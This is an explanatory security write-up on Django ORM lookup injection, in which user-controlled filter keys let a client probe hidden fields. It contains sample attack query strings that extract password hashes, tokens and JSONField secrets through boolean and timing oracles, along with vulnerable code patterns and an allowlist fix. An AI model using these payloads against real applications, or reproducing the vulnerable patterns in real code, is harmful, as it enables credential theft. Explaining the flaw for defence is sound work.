Django ORM Leak refers to a class of vulnerabilities in which untrusted input is used as the *key* of a Django ORM lookup (the `field__lookup` keyword passed to `filter()`/`exclude()`/`get()`), not merely as the value. The generated SQL is still parameterized, so this is not SQL injection; it is lookup injection: the caller chooses which column is compared and with which operator, including columns the endpoint never returns (password hashes, tokens), fields on related models reached via `__`, and keys inside `JSONField` values. Data is then extracted one character per request through a boolean oracle (does the filtered result set change?) or, with `__regex`, a timing side channel.
# Django turns keyword names into lookups: `<field>__<lookup>`, and
# `<relation>__<field>__<lookup>` to walk foreign keys.
# If the user controls the keyword (left-hand side), they pick the column
# and the operator, not just the compared value:
# The lookup key (column + operator) comes straight from the caller.
lookup = {user_input: value}
User.objects.filter(**lookup)
# Attacker can probe any field on the model — including ones the endpoint
# never serializes — and, with `__`, fields on related models (e.g.
# `created_by__password__startswith=` where `created_by` is a FK to the user model):
?filter=password__startswith=a
?filter=email__contains=admin
?filter=token__regex=^abc
# With JSONField, key transforms chain the same way, so the same probing reaches
# into nested JSON values (`profile__secret_key` reads key `secret_key` of the
# `profile` document):
?filter=profile__secret_key__startswith=sk_
# Or enumerate structure:
?filter=settings__has_key=api_key
# Boolean-based data extraction: any observable difference (non-empty result,
# count, 200 vs 404, pagination) is an oracle, so one request confirms one
# character — blind-SQLi style, but through the ORM. Note that on Django's
# default user model `password` holds the hash string (e.g. `pbkdf2_sha256$...`),
# so this leaks the hash for offline cracking rather than the plaintext; token
# and API-key fields leak directly.
GET /api/users?password__regex=^a # Returns results?
GET /api/users?password__regex=^b # Returns results?
# Timing-based extraction: only works with a pattern whose evaluation cost
# depends on whether the guessed prefix matches (catastrophic backtracking
# anchored on the guessed character); the `^a.*` / `^b.*` probes below show the
# shape of the request, not a pattern that produces a measurable delay on its
# own. Which regex engine runs the pattern is backend-dependent (the SQLite
# backend implements REGEXP with Python's `re`; PostgreSQL and MySQL use their
# native engines), which decides what a slow pattern looks like.
GET /api/users?password__regex=^a.* # Time response
GET /api/users?password__regex=^b.* # Compare times
# Dangerous: the user controls the filter field name (and operator).
# Fix: accept only an explicit allowlist of complete lookup strings, e.g.
# `ALLOWED = {"name", "name__icontains", "status"}` and
# `Model.objects.filter(**{k: v for k, v in request.GET.items() if k in ALLOWED})`;
# a DRF FilterSet with enumerated fields does the same. Restricting the
# serializer's output fields does not help — the oracle is whether rows match,
# not what is rendered.
# Every query-string key becomes a lookup keyword: field AND operator are
# chosen by the client.
lookups = request.GET.dict()
Model.objects.filter(**lookups)
# Also dangerous: building the lookup key by string formatting from a
# user-supplied field name is the same injection — the operator is fixed, but
# the column is still the caller's choice:
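# Keyword-argument names cannot be expressions, so the formatted lookup must be
# spread in via a dict (`filter(f"...": value)` is a syntax error). The spread
# also makes it obvious that `field` picks the column being compared.
Model.objects.filter(**{f"{field}__contains": value})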